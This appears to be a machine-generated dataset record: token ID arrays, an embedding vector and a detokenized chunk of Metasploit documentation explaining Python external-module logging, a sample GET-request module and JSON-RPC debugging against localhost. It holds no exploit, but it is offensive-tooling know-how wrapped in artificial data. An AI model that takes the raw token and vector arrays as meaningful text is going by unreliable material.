[ 1012, 1037, 8833, 11774, 3917, 2064, 2022, 16437, 1998, 2109, 2000, 10639, 3570, 2592, 2067, 2000, 7705, 2076, 7781, 1997, 1996, 18750, 11336, 1012, 2182, 2003, 3642, 1055, 3490, 29519, 2008, 3594, 1996, 8833, 11774, 3917, 1024, 12324, 15899, 2013, 18804, 13102, 4135, 4183, 12324, 11336, 11336, 1012, 8833, 11774, 3917, 1012, 16437, 1006, 5796, 2290, 1035, 17576, 1027, 1005, 15899, 3231, 1024, 1005, 1007, 15899, 1012, 18558, 1006, 1005, 18558, 1005, 1007, 15899, 1012, 7561, 1006, 1005, 7561, 1005, 1007, 15899, 1012, 5432, 1006, 1005, 5432, 1005, 1007, 15899, 1012, 2139, 8569, 2290, 1006, 1005, 2139, 8569, 2290, 1005, 1007, 1996, 11336, 1012, 8833, 11774, 3917, 1012, 16437, 1006, 1007, 3853, 2003, 2109, 1996, 3443, 1037, 28213, 1998, 4289, 3334, 2008, 2097, 2655, 11336, 1012, 8833, 1006, 1007, 2007, 1996, 6413, 8833, 2504, 1012, 2440, 2742, 1001, 999, 1013, 2149, 2099, 1013, 8026, 1013, 4372, 2615, 18750, 2509, 1001, 1011, 1008, 1011, 16861, 1024, 21183, 2546, 1011, 1022, 1011, 1008, 1011, 1001, 3115, 14184, 12324, 15899, 1001, 4469, 14184, 12530, 15266, 1035, 4394, 1027, 6270, 3046, 1024, 12324, 11186, 3272, 12324, 2121, 29165, 1024, 12530, 15266, 1035, 4394, 1027, 2995, 2013, 18804, 13102, 4135, 4183, 12324, 11336, 27425, 1027, 1063, 1005, 2171, 1005, 1024, 1005, 18750, 11336, 2742, 1005, 1010, 1005, 6412, 1005, 1024, 1005, 1005, 1005, 18750, 4807, 2007, 5796, 11329, 5644, 9890, 1012, 1005, 1005, 1005, 1010, 1005, 6048, 1005, 1024, 1031, 1005, 6213, 6487, 4244, 1005, 1033, 1010, 1005, 3058, 1005, 1024, 1005, 2760, 1011, 6021, 1011, 2570, 1005, 1010, 1005, 6105, 1005, 1024, 1005, 5796, 2546, 1035, 6105, 1005, 1010, 1005, 7604, 1005, 1024, 1031, 1063, 1005, 2828, 1005, 1024, 1005, 24471, 2140, 1005, 1010, 1005, 25416, 1005, 1024, 1005, 16770, 1024, 1013, 1013, 9927, 1012, 5915, 2581, 1012, 4012, 1013, 2418, 1013, 2260, 1013, 2654, 1013, 19723, 10128, 3436, 1011, 18750, 1011, 1999, 1011, 18804, 13102, 4135, 4183, 1013, 1005, 1065, 1010, 1063, 1005, 2828, 1005, 1024, 1005, 9875, 1005, 1010, 1005, 25416, 1005, 1024, 1005, 3147, 9221, 1005, 1065, 1033, 1010, 1005, 2828, 1005, 1024, 1005, 2309, 1035, 26221, 1005, 1010, 1005, 7047, 1005, 1024, 1063, 1005, 4539, 9496, 1005, 1024, 1063, 1005, 2828, 1005, 1024, 1005, 5164, 1005, 1010, 1005, 6412, 1005, 1024, 1005, 1996, 2918, 4130, 1005, 1010, 1005, 3223, 1005, 1024, 2995, 1010, 1005, 12398, 1005, 1024, 1005, 1013, 1005, 1065, 1010, 1005, 1054, 15006, 2102, 1005, 1024, 1063, 1005, 2828, 1005, 1024, 1005, 4769, 1005, 1010, 1005, 6412, 1005, 1024, 1005, 4539, 4769, 1005, 1010, 1005, 3223, 1005, 1024, 2995, 1010, 1005, 12398, 1005, 1024, 3904, 1065, 1065, 1065, 13366, 2448, 1006, 12098, 5620, 1007, 1024, 11336, 1012, 8833, 11774, 3917, 1012, 16437, 1006, 5796, 2290, 1035, 17576, 1027, 1005, 1063, 1065, 1011, 1005, 1012, 4289, 1006, 12098, 5620, 1031, 1005, 1054, 15006, 2102, 1005, 1033, 1007, 1007, 2065, 12530, 15266, 1035, 4394, 1024, 15899, 1012, 7561, 1006, 1005, 11336, 24394, 1006, 11186, 1007, 2003, 4394, 1010, 3685, 3613, 1005, 1007, 2709, 1001, 2115, 3642, 2182, 3046, 1024, 1054, 1027, 11186, 1012, 2131, 1006, 1005, 16770, 1024, 1013, 1013, 1063, 1065 ]
metasploit
121.txt
2
/ { } '. format ( args ['rhost'], args ['targeturi'] ), verify = false ) except requests. exceptions. requestexception as e : logging. error ('{ } '. format ( e ) ) return logging. info ('{ }... '. format ( r. text [ 0 : 50 ] ) ) if _ _ name _ _ = ='_ _ main _ _': module. run ( metadata, run ) the example sends a get request to the given rhost and targeturi, then calls logging. info ( ) on the result to have the output displayed in msfconsole. debugging python modulesif you want to run an external module as a standalone program from your metasploit - framework folder just specify the python path to include the metasploit library support and run the module directly : $ pythonpath =. / lib / msf / core / modules / external / python : $ pythonpath python3. / modules / auxiliary / scanner / wproxy / att _ open _ proxy. py the python module will wait for stdin to receive json - rpc input. entering the request to run the module : { " jsonrpc " : " 2. 0 ", " id " : " 1337 ", " method " : " run ", " params " : { " rhosts " : [ " 127. 0. 0. 1 " ], " rport " : " 49152 " } } you will see the json - rpc responses printed to stdout : { " jsonrpc " : " 2. 0 ", " method " : " message ", " params " : { " level " : " debug ", " message " : " 127. 0. 0. 1 : 49152 - connected " } } { " jsonrpc " : " 2. 0 ", " method " : " message ", " params " : { " level " : " debug ", " message " : " 127. 0. 0. 1 : 49152 - received 5 bytes " } } { " jsonrpc " : " 2. 0 ", " method " : " message ", " params " : { " level " : " info ", " message " : " 127. 0. 0. 1 : 49
[ 0.8636360764503479, -0.6926441788673401, -0.8852104544639587, 0.413021057844162, -0.20844562351703644, -0.23152899742126465, -0.2676069438457489, 0.06081841140985489, 0.1309666931629181, 0.7379910945892334, 0.070290207862854, 0.2113942801952362, 0.5726444721221924, -0.4138043522834778, -0.7616019248962402, -0.17848026752471924, -0.4770624339580536, -0.6295943260192871, -1.0029722452163696, 0.35763028264045715, 0.44171395897865295, 0.023868897929787636, -0.6106644868850708, -0.7080888748168945, -0.8648747205734253, 0.3992440104484558, 0.3476586639881134, -0.10783061385154724, 0.5310758352279663, 0.38113677501678467, 0.18714360892772675, -0.24314524233341217, -0.17452168464660645, -0.4000784456729889, 0.21428513526916504, -0.3600198030471802, 0.7055619359016418, -0.47700148820877075, -0.30665603280067444, -0.5974017381668091, 0.08104678988456726, -0.3694084882736206, -0.1929210126399994, -0.7011329531669617, -0.37354546785354614, -0.3900163471698761, 0.32412976026535034, 0.11863936483860016, 0.7995883822441101, 0.3341284990310669, 0.6078169345855713, 0.716415524482727, 0.05518864467740059, -0.0740148201584816, -0.33878880739212036, -0.5616387128829956, -0.3031183183193207, 0.16727684438228607, -0.4465183615684509, 0.0027386429719626904, -0.07939339429140091, 0.43667420744895935, 0.46421849727630615, -0.6814213395118713, 0.3266420364379883, 0.12907657027244568, 0.27497079968452454, -0.15122368931770325, -0.22530938684940338, -0.1806129813194275, -0.21415120363235474, 0.6400903463363647, -0.9021704196929932, -0.7164162397384644, -0.45523592829704285, 0.15895619988441467, -0.03812861815094948, -0.6164479851722717, -0.46948787569999695, 0.8201524019241333, 0.01472187228500843, 1.032036304473877, 0.16949453949928284, -0.14291633665561676, -0.646821916103363, -0.6119899749755859, 0.45840394496917725, 0.7549180388450623, -0.6441025137901306, 0.6892525553703308, 0.39517584443092346, 0.12501220405101776, -0.7002019882202148, -0.3531634509563446, -0.08951360732316971, 0.8790839910507202, -0.1257055252790451, 0.003545968560501933, -0.018023554235696793, -0.2951045036315918, 1.0373164415359497, 1.0996923446655273, -0.18803878128528595, -0.23939836025238037, -0.2035699039697647, 0.5846534967422485, 0.7120420336723328, -0.23831447958946228, -0.47232723236083984, -0.059625908732414246, 0.6995497941970825, -0.40539467334747314, -0.12495595961809158, -1.1788110733032227, -0.026132453233003616, 0.7511708736419678, 0.149867981672287, -0.30986618995666504, -0.3933897912502289, 0.4615866541862488, -0.32961970567703247, -0.5160064101219177, 0.44608747959136963, -0.1837136447429657, 0.34405437111854553, -0.045214779675006866, 0.7211458683013916, 0.7595686912536621, -0.9145538806915283, -0.593213677406311, -0.3283154368400574, -0.11165142059326172, -0.17546142637729645, 0.5149779915809631, -0.3197616934776306, 0.3183882534503937, 0.2733948230743408, 0.505796492099762, 0.6157472133636475, -0.8699765205383301, 0.1467101275920868, 0.15997689962387085, 0.003896127687767148, 1.638243556022644, -0.4879666566848755, 0.03349313884973526, -0.30233997106552124, 0.25885605812072754, -0.42621278762817383, 0.30707022547721863, 0.007249362301081419, -0.3438646197319031, 0.3125303089618683, 0.08718886971473694, -0.6628027558326721, -0.09346643090248108, -0.2776298224925995, 0.6540953516960144, 0.2741318643093109, 0.131819948554039, 0.2546265721321106, 1.084436058998108, -0.6118656992912292, 0.6305632591247559, -0.5590582489967346, 0.6557852625846863, -0.4820166826248169, -1.0033289194107056, 0.11287251859903336, -0.011581849306821823, 0.18408523499965668, 0.3998558521270752, 0.3234655559062958, -0.1619797646999359, 0.975572407245636, 0.6687608957290649, 0.15617191791534424, -0.7299971580505371, 0.61222904920578, 0.475030779838562, -0.6676612496376038, 0.6745616793632507, -0.1250867396593094, 0.8985801339149475, 0.11963951587677002, 0.05964126065373421, 0.42613837122917175, -0.6221820712089539, -0.3248608112335205, -0.38277679681777954, 0.4345782995223999, 0.27385833859443665, -0.586815595626831, 0.8475595116615295, 0.568606436252594, -0.3457091152667999, -1.1212624311447144, 0.16285106539726257, -0.5276461839675903, -1.183901071548462, -0.28273770213127136, 0.5957328677177429, 0.4074721932411194, 0.7967985272407532, 0.0007662181160412729, 0.023956874385476112, 0.5558244585990906, 0.4839411675930023, 0.06865666061639786, 0.39509162306785583, 1.0764020681381226, -0.1742413192987442, -0.5119425654411316, 0.1468169242143631, 0.2175656408071518, -0.16087229549884796, -0.40310272574424744, 0.5156829953193665, 0.38067692518234253, 0.1959351748228073, 0.03940397873520851, 0.6278719902038574, 0.17597314715385437, 0.33829692006111145, -0.6561646461486816, -0.7750325798988342, -0.5297921895980835, 0.1771637499332428, -0.19065117835998535, 0.22630172967910767, -0.4321243166923523, 0.5475388169288635, -0.11753180623054504, 1.1242899894714355, -0.13816164433956146, -0.7246471643447876, 0.3921409249305725, 0.5548129677772522, 0.056580428034067154, -0.13454332947731018, -0.2893797755241394, 0.8539287447929382, 0.3653057813644409, 0.31876033544540405, 0.006223589647561312, 0.21162167191505432, -0.24413037300109863, -0.19869141280651093, -0.18161554634571075, 0.586362361907959, 0.07721485942602158, 1.2227107286453247, 0.25857633352279663, -0.2683391273021698, -0.8541566133499146, -0.7407680749893188, 0.5987164974212646, 0.598918080329895, -0.856606662273407, -0.8422433137893677, 0.1564304232597351, -0.5691750049591064, -0.9098668098449707, -0.6187573671340942, 0.13613782823085785, 0.5814794301986694, -0.3414462208747864, 0.18847602605819702, -0.047435957938432693, -0.5885704755783081, -0.4122609496116638, 0.18852484226226807, -0.536786675453186, -0.5310585498809814, -0.9661669135093689, 0.42235827445983887, 0.21411854028701782, -0.3897166848182678, 0.5500468611717224, -0.1961250603199005, -0.6209970116615295, 0.3008619248867035, 0.08485402911901474, 0.6432980298995972, -0.5077890157699585, -0.5333772897720337, -0.7915326952934265, 0.08740798383951187, -0.6746114492416382, 0.438071072101593, -0.5788640975952148, -0.1971796751022339, -0.2759046256542206, -0.26035141944885254, 0.09323494136333466, 0.13998320698738098, 0.9416527152061462, 0.23806649446487427, -0.08785673975944519, 0.008633974008262157, 0.29536569118499756, -0.22827725112438202, 0.5905812978744507, -0.16880755126476288, -0.43590831756591797, 0.2828967273235321, 0.32592839002609253, -0.16483575105667114, 0.9756671786308289, 0.6740245223045349, -0.7072842121124268, 0.11041953414678574, -0.15233370661735535, 0.13720493018627167, -1.193974494934082, 0.3059544861316681, 0.09999498724937439, -0.18585540354251862, -0.10597380995750427, -0.29068687558174133, 0.2787216603755951, -0.44977524876594543, 0.005102476570755243, 0.14755569398403168, -0.24759672582149506, 0.6208817958831787, 0.3196597695350647, -0.7932813167572021, 0.5528888702392578, -0.264487624168396, 0.11784727871417999, -0.45502015948295593, -0.11836635321378708, 0.8938863277435303, 0.7820191383361816, 0.6811400055885315, -0.6066910624504089, -0.07507123798131943, -0.09626397490501404, -0.017087407410144806, -0.03476812690496445, -0.2528260350227356, 0.610152542591095, 0.5568715929985046, -0.2263902872800827, 0.8413193225860596, 0.5810622572898865, -0.7666840553283691, -0.06343253701925278, 0.16885139048099518, -0.7064668536186218, 0.05869506672024727, 0.5312230587005615, 0.2542947232723236, 0.38975971937179565, 0.7611461281776428, -0.5582776665687561, -0.2312745600938797, -0.06445044279098511, 0.29372113943099976, 0.7973542809486389, 0.25885218381881714, -0.10360780358314514, -0.12686653435230255, -0.5305293202400208, -0.3530750870704651, 0.25003233551979065, 0.00064392777858302, 1.0769883394241333, 0.05587681010365486, 0.46995699405670166, -0.5204357504844666, -0.24744097888469696, 0.10085843503475189, -0.33216243982315063, -0.5856819152832031, 0.6440166234970093, -0.2554042637348175, 0.5791267156600952, -0.025631235912442207, 0.5480276942253113, 0.07780274748802185, -0.35976192355155945, 0.19885143637657166, -0.10883394628763199, -0.3684231638908386, -0.8384329080581665, -0.4628499746322632, -0.10787826031446457, -0.3284372389316559, 0.3480601906776428, 0.012361542321741581, 0.4796700179576874, -0.5373830199241638, -0.42853429913520813, -0.5501865744590759, 1.1379249095916748, 1.234142780303955, 0.970103919506073, 0.5868782997131348, 1.130754828453064, 0.1713167428970337, -0.2202797532081604, 0.37887251377105713, -0.06950698047876358, 1.1051522493362427, -0.8501364588737488, 0.634717583656311, -0.37768396735191345, 0.2152973860502243, -0.9426628351211548, -0.002571280114352703, -0.4334908127784729, -0.4826911985874176, 0.4357115924358368, -0.15312828123569489, -0.7238575220108032, -0.3163233697414398, 0.47332677245140076, -0.3949168920516968, 0.004774660337716341, -0.9424846768379211, 0.2504808008670807, 0.9397980570793152, 0.8550475835800171, -0.5500443577766418, 0.11306397616863251, -0.6705878376960754, 0.06463169306516647, 0.41374409198760986, -0.16743917763233185, -0.8074955344200134, -0.6130285263061523, -0.5137335658073425, -1.2125275135040283, 0.2743556797504425, 0.09831281006336212, -0.03664663806557655, -0.3978193998336792, -0.90425044298172, -0.5869299173355103, 0.23474422097206116, -0.41112953424453735, -0.8512499928474426, -0.5029229521751404, 0.3705381453037262, 0.27341094613075256, 0.6527069807052612, -0.23181971907615662, -0.12495629489421844, -0.09153704345226288, -0.2892387807369232, 0.5276708006858826, -1.0426524877548218, 0.3252049386501312, 0.7360948324203491, -0.39171817898750305, -0.0035198519472032785, -0.04053822159767151, -0.5623090863227844, -0.21802738308906555, -0.31584346294403076, -0.31804582476615906, -0.08042439073324203, -0.3805265724658966, 0.9257075190544128, 0.1310620754957199, 0.1848851442337036, 0.2568034827709198, 0.5351402759552002, -0.3794386088848114, 0.3804812729358673, 0.29455435276031494, 0.3703087270259857, 0.1359337568283081, -0.45778125524520874, 0.8520316481590271, -0.06389009952545166, 0.40267854928970337, -0.025207212194800377, -0.4238796532154083, 0.7046999335289001, 0.523493230342865, 0.3164372444152832, -0.6424722671508789, -0.7417988181114197, 0.20228412747383118, 0.37458109855651855, 0.11904767155647278, 0.8876304030418396, -0.7505123019218445, 0.09691626578569412, -0.001299372990615666, -0.3163948655128479, -0.6046096086502075, -0.2905477285385132, 0.15139132738113403, -0.06663952767848969, 0.43386709690093994, 0.32418093085289, 0.367484986782074, -0.6569192409515381, -0.8373668193817139, 0.32150232791900635, -0.5587763786315918, -0.19248445332050323, -0.6727519631385803, 0.2063562124967575, -0.6421863436698914, 0.498292475938797, -0.24996045231819153, -0.1097906231880188, -0.3659837245941162, 0.2851157486438751, -0.11371617764234543, 0.5700955390930176, 0.3446018397808075, -0.5522615909576416, -0.33830147981643677, 0.30505719780921936, 0.38630130887031555, -0.5695517659187317, 0.3346325755119324, 0.5092114806175232, -0.5317457914352417, 0.11784714460372925, -0.12769177556037903, -0.7092368006706238, -0.37354618310928345, -0.7127301692962646, 0.13723492622375488, -0.08231758326292038, 0.24538561701774597, -0.5359351634979248, -0.3335355520248413, -0.9162464737892151, 0.19627386331558228, 0.11944784969091415, -0.9237887859344482, -0.6496983766555786, 0.03501936420798302, 0.8052337765693665, -0.09633960574865341, 0.12805598974227905, -0.15826046466827393, -0.10270436108112335, 0.11197070777416229, 0.4848001301288605, 0.34502777457237244, -0.21102547645568848, -0.019982822239398956, 0.19060248136520386, 0.10136722028255463, 0.3018725514411926, -0.8502607941627502, -0.34005051851272583, -0.23437607288360596, 0.130496546626091, -0.5025097131729126, 0.6762740015983582, -0.04975806176662445, 0.25488319993019104, 0.33606982231140137, 0.6977880001068115, -0.24024318158626556, 0.0325435996055603, -0.01989797130227089, 0.3773265779018402, 0.6782360076904297, -0.41602078080177307, -0.19307953119277954, 0.2911430597305298, 0.4927615523338318, 0.4222294092178345, -0.12376625835895538, -0.0723317489027977, 0.08272208273410797, -0.6103230118751526, -0.7528205513954163, 0.32415997982025146, 0.12768715620040894, -0.6937442421913147, -0.04665536433458328, -0.03579115867614746, 0.9941084980964661, -0.258727103471756, 0.31759700179100037, 0.8300788998603821, 0.12180981040000916, 0.03344246745109558, -1.156182885169983, 0.19720755517482758, 0.5930612087249756, -0.2835831940174103, 0.42923611402511597, -0.6451387405395508, 0.22416459023952484, 0.07797766476869583, -0.24911998212337494, -0.5088330507278442, -0.4880293607711792, -0.5872774720191956, 0.4103665053844452, -0.3894937336444855, 0.24178627133369446, -0.24426430463790894, -0.9449000358581543, -0.7530924677848816, 0.4993555247783661, 0.038729533553123474, -0.17540986835956573, 0.4469492435455322, 0.3404121994972229, 1.034304141998291, -0.2550942301750183, 0.883434534072876, 0.3763778805732727, -0.297786146402359, 0.5857364535331726, -0.6869675517082214, -0.4776425361633301, 0.8655381798744202, 0.5356234312057495, -0.8300186395645142, -0.18963998556137085, -0.7404963970184326, -0.04134933277964592, 0.06828895956277847, -0.33895397186279297, -0.8201603889465332, -0.0589386522769928, 0.5676739811897278, 0.1737484186887741, 0.8750109672546387, 0.33570918440818787, 0.43671974539756775, -0.7524928450584412, -0.22507858276367188, -0.4433952271938324, 0.26795148849487305, 0.8383013010025024, -0.5382912158966064, -0.24043145775794983, -0.87748783826828, -0.22997666895389557, 0.05620718374848366, 0.5006449818611145, 0.8515417575836182, -0.30025166273117065, 0.6525360345840454, 0.07941240817308426, -0.09660828113555908, 1.042084813117981, 0.10426241904497147, 0.4577348828315735, 0.6208824515342712, 0.09908455610275269, -0.6515206694602966, -0.5474370718002319, -0.15400424599647522, 0.2484062761068344, 0.7555515766143799, 0.19302324950695038, -0.25107327103614807, -0.24070487916469574, -0.2566501200199127, 0.07472451776266098, -1.2396823167800903, -0.3868459165096283, -0.9434741139411926, 0.2579878568649292, -0.03900737687945366, -0.2533423602581024, -0.6875821352005005, -0.4191869795322418, -0.26966002583503723, -0.4642960727214813, -0.5182132720947266, -0.4117179214954376, 0.3525935411453247, -0.24129004776477814, -0.582109272480011, -0.021679820492863655, -0.9646244645118713, -0.9403239488601685, -0.44564682245254517, 0.09614011645317078, -0.2015538215637207, -0.5395911335945129, -0.39099055528640747, -0.5041056275367737, -0.3231518268585205, 0.4945029616355896, -0.9222076535224915, -0.3216550350189209, -0.09012533724308014, -0.7194614410400391, -0.09825652092695236, 0.8160430192947388, -0.3831537961959839, -0.15797360241413116, 0.23048140108585358, 0.33808112144470215, 0.21889948844909668, -0.6913946270942688, -0.013433055952191353, 0.17405946552753448, -0.008931903168559074, 0.4013049006462097, -0.16691462695598602, -0.474289208650589, 0.12096650153398514, 0.722414493560791, -0.31117984652519226, -0.07822553813457489, -0.3340158462524414, -0.25302693247795105, 0.22029796242713928, -0.04116611182689667, 0.9194878935813904, 0.7323506474494934, 0.5255336761474609, 0.3625045716762543, 0.08338158577680588, 0.5845146179199219, -0.033175282180309296, -0.4422842562198639, 0.17959503829479218, 0.11594738066196442, 0.06342891603708267, -0.6282486319541931, -0.09761770069599152, -0.10818661004304886, -0.3147639334201813, 0.5491028428077698, -0.2231667935848236, 0.42887645959854126, -0.553182065486908, -0.7585713267326355, 0.13542817533016205, 0.22909869253635406, -0.03253348916769028, -0.06880991160869598, 0.09763681143522263, 0.13910891115665436, -0.37932589650154114, 0.3256223201751709, -0.9995788335800171, 0.16205067932605743, 0.39640697836875916, -0.23759235441684723, -0.2996484935283661, -1.1043124198913574, -0.06626218557357788, -0.06536738574504852, 0.09347540885210037, -0.5889114737510681, 0.20264357328414917, 0.05805320292711258, 0.31804049015045166, 1.8417160511016846, -0.8452297449111938, -0.2717360556125641, -0.45133310556411743, 1.0057088136672974, -0.6784796118736267, -0.7374334931373596, 0.4357599914073944, 0.8948035836219788, 0.8026544451713562, -0.4582526683807373, -0.8557907342910767, -0.40263718366622925, -0.048315826803445816, 0.0694226622581482, -0.14428573846817017, 0.4649811387062073, -0.43664243817329407, 0.7505218982696533, -0.3366182744503021, 0.45922839641571045, -0.24620218575000763, -0.19286470115184784, 0.6508026123046875, -0.6396896839141846, -0.1638651192188263, 0.22600513696670532, -0.4806042015552521, 0.11873191595077515, 0.8611690402030945, 0.5282385945320129, 0.3716204762458801, -0.8539600968360901, 0.031758297234773636, -0.7855561971664429, 0.4284828007221222, 0.08396168053150177, 0.24711723625659943, 0.0956609696149826, 0.5824618339538574, 0.22523358464241028, -0.8764833807945251, -0.15166230499744415, 0.8335838913917542, 0.34254491329193115, 0.08016815781593323, 0.26447027921676636, -0.2438550591468811, 0.13226401805877686, 0.09469200670719147, -0.5474826693534851, 0.4541577994823456, 0.4369724988937378, 0.3229358494281769, -0.2963501513004303, -0.044242728501558304, 0.5633208155632019, 0.01777445338666439, 0.5426416993141174, 0.015232222154736519, -0.5702508091926575, 0.605675458908081, 0.044235408306121826, -0.2926064133644104, 0.6934552788734436, 1.0370728969573975, 0.4178834557533264, 0.12050902098417282, 0.3771059811115265, 0.2904563844203949, 0.6669315695762634, -0.39691275358200073, -0.12866826355457306, -0.4137997329235077, 0.1254376471042633, 0.11580728739500046, -0.6654309630393982, -0.7187031507492065, -0.2393294870853424, 0.5687307119369507, 0.11875682324171066, 0.14750778675079346, 0.19488605856895447, 0.4580056667327881, -0.8371795415878296, 0.1471433788537979, -0.34400665760040283, 0.10228798538446426, 0.0186601709574461, 0.48281073570251465, -0.5669187903404236, 1.084477186203003, 0.3056661784648895, 0.2930677533149719, -0.11094246804714203, 1.274290919303894, -0.13819237053394318, -0.04538097605109215, 0.0923793762922287, 0.01855299063026905, -0.5021932721138, -0.41930946707725525, -0.4290192425251007, -0.1876385509967804, 0.9566652178764343, 0.31562119722366333, 0.8638807535171509, -0.5641869306564331, -0.6795089244842529, -0.6233035326004028, 0.30360305309295654, -0.43702462315559387, -0.6024079322814941, 1.1125941276550293, -0.11139287799596786, -0.6126611828804016, -0.31561195850372314, 0.23934316635131836, 0.4322566092014313, 0.06644459813833237, -0.12719395756721497, -0.548060953617096, -0.5386286377906799, 0.0396965853869915, 0.05512787401676178, 0.6506756544113159, -0.42200127243995667, -0.1363409161567688, 0.6344484686851501, -0.9884694814682007, -0.6584700345993042, -0.1271996796131134, -0.312579482793808, -0.1640310436487198, 0.7077222466468811, 0.7462213039398193, 0.9529215693473816, 0.49019691348075867, -0.6216107606887817, 0.15803687274456024, -0.07941131293773651, 0.7741454839706421, -0.07281709462404251, 0.33997461199760437, 0.13570435345172882, -0.04094543680548668, -0.13258464634418488, -0.7045301795005798, 0.49854210019111633, 0.4481341540813446, -0.38105618953704834, 0.32094788551330566, -0.20860300958156586, -0.8665164709091187, -0.5045740604400635, 0.42743921279907227, 0.23121421039104462, 0.22340604662895203, -0.16851218044757843, -0.8743603229522705, -0.024709105491638184, -0.575273871421814, -0.2356494814157486, -0.03244085609912872, 0.37689757347106934, 0.2361542135477066, -0.2568776309490204, -0.054580822587013245, -1.06015145778656, 4.238033771514893, 0.710426390171051, 0.26515161991119385, -0.14440928399562836, 0.38124603033065796, 0.2542138397693634, 0.7577274441719055, -0.25674399733543396, 0.16820354759693146, -0.3383704423904419, 0.4958724081516266, 0.23657111823558807, 0.3073424696922302, 0.3859347105026245, -0.005832531489431858, 0.6654549837112427, -0.5545936226844788, 0.3949422836303711, 0.0865330845117569, -0.9775846004486084, -0.6107006669044495, -0.4591659605503082, -0.4724244475364685, 1.1015396118164062, 0.17404316365718842, 0.6026055812835693, 0.4323771893978119, -0.7332127094268799, 0.2711336314678192, -0.24442684650421143, -0.1636807769536972, -0.2513335049152374, -0.20578749477863312, -0.07278748601675034, -0.5252074599266052, -0.019413970410823822, -0.36721116304397583, -1.225937843322754, -0.5235857367515564, -0.17665524780750275, 0.7111151814460754, -0.0427473783493042, -0.1273128241300583, -0.6888092160224915, 0.5217609405517578, 0.7555943727493286, -0.6587057113647461, 0.11722198128700256, 1.0870698690414429, -0.8861515522003174, 0.3931322991847992, -0.42397719621658325, 0.6404378414154053, -0.2631249725818634, -0.7897159457206726, 0.11957068741321564, 0.5434277057647705, -0.7312009930610657, -0.21722646057605743, 0.2058723270893097, 0.040984608232975006, -0.6804301738739014, 0.18793874979019165, -0.4599464237689972, -0.8686979413032532, 0.7985554337501526, -0.7097184658050537, -0.1231377124786377, -0.3468448519706726, 0.5759826302528381, -0.7374252676963806, 0.3208391070365906, -0.54941326379776, -0.34875041246414185, 0.34075233340263367, 0.06945040076971054, 0.2615211308002472, 0.38018277287483215, 1.2230114936828613, -0.06075378134846687, -0.3542983829975128, -0.3644687533378601, -0.8742383718490601, 0.5013518929481506, 0.8067026734352112, 0.6348738074302673, -0.1448516994714737, -0.942679762840271, -0.2524781823158264, 0.4768979847431183, 0.7624453902244568, 0.1495954543352127, -0.42985299229621887, 0.43420013785362244, 0.16473892331123352 ]
[ 1013, 1063, 1065, 1005, 1012, 4289, 1006, 12098, 5620, 1031, 1005, 1054, 15006, 2102, 1005, 1033, 1010, 12098, 5620, 1031, 1005, 4539, 9496, 1005, 1033, 1007, 1010, 20410, 1027, 6270, 1007, 3272, 11186, 1012, 11790, 1012, 5227, 10288, 24422, 2004, 1041, 1024, 15899, 1012, 7561, 1006, 1005, 1063, 1065, 1005, 1012, 4289, 1006, 1041, 1007, 1007, 2709, 15899, 1012, 18558, 1006, 1005, 1063, 1065, 1012, 1012, 1012, 1005, 1012, 4289, 1006, 1054, 1012, 3793, 1031, 1014, 1024, 2753, 1033, 1007, 1007, 2065, 1035, 1035, 2171, 1035, 1035, 1027, 1027, 1005, 1035, 1035, 2364, 1035, 1035, 1005, 1024, 11336, 1012, 2448, 1006, 27425, 1010, 2448, 1007, 1996, 2742, 10255, 1037, 2131, 5227, 2000, 1996, 2445, 1054, 15006, 2102, 1998, 4539, 9496, 1010, 2059, 4455, 15899, 1012, 18558, 1006, 1007, 2006, 1996, 2765, 2000, 2031, 1996, 6434, 6913, 1999, 5796, 11329, 5644, 9890, 1012, 2139, 8569, 12588, 18750, 14184, 10128, 2017, 2215, 2000, 2448, 2019, 6327, 11336, 2004, 1037, 26609, 2565, 2013, 2115, 18804, 13102, 4135, 4183, 1011, 7705, 19622, 2074, 20648, 1996, 18750, 4130, 2000, 2421, 1996, 18804, 13102, 4135, 4183, 3075, 2490, 1998, 2448, 1996, 11336, 3495, 1024, 1002, 18750, 15069, 1027, 1012, 1013, 5622, 2497, 1013, 5796, 2546, 1013, 4563, 1013, 14184, 1013, 6327, 1013, 18750, 1024, 1002, 18750, 15069, 18750, 2509, 1012, 1013, 14184, 1013, 9830, 1013, 26221, 1013, 1059, 21572, 18037, 1013, 2012, 2102, 1035, 2330, 1035, 24540, 1012, 1052, 2100, 1996, 18750, 11336, 2097, 3524, 2005, 2358, 8718, 2000, 4374, 1046, 3385, 1011, 1054, 15042, 7953, 1012, 5738, 1996, 5227, 2000, 2448, 1996, 11336, 1024, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 8909, 1000, 1024, 1000, 14506, 2581, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 2448, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 1054, 15006, 3215, 1000, 1024, 1031, 1000, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1000, 1033, 1010, 1000, 1054, 6442, 1000, 1024, 1000, 4749, 16068, 2475, 1000, 1065, 1065, 2017, 2097, 2156, 1996, 1046, 3385, 1011, 1054, 15042, 10960, 6267, 2000, 2358, 26797, 2102, 1024, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 4471, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1000, 2139, 8569, 2290, 1000, 1010, 1000, 4471, 1000, 1024, 1000, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 4749, 16068, 2475, 1011, 4198, 1000, 1065, 1065, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 4471, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1000, 2139, 8569, 2290, 1000, 1010, 1000, 4471, 1000, 1024, 1000, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 4749, 16068, 2475, 1011, 2363, 1019, 27507, 1000, 1065, 1065, 1063, 1000, 1046, 3385, 14536, 2278, 1000, 1024, 1000, 1016, 1012, 1014, 1000, 1010, 1000, 4118, 1000, 1024, 1000, 4471, 1000, 1010, 1000, 11498, 5244, 1000, 1024, 1063, 1000, 2504, 1000, 1024, 1000, 18558, 1000, 1010, 1000, 4471, 1000, 1024, 1000, 13029, 1012, 1014, 1012, 1014, 1012, 1015, 1024, 4749 ]
metasploit
121.txt
3
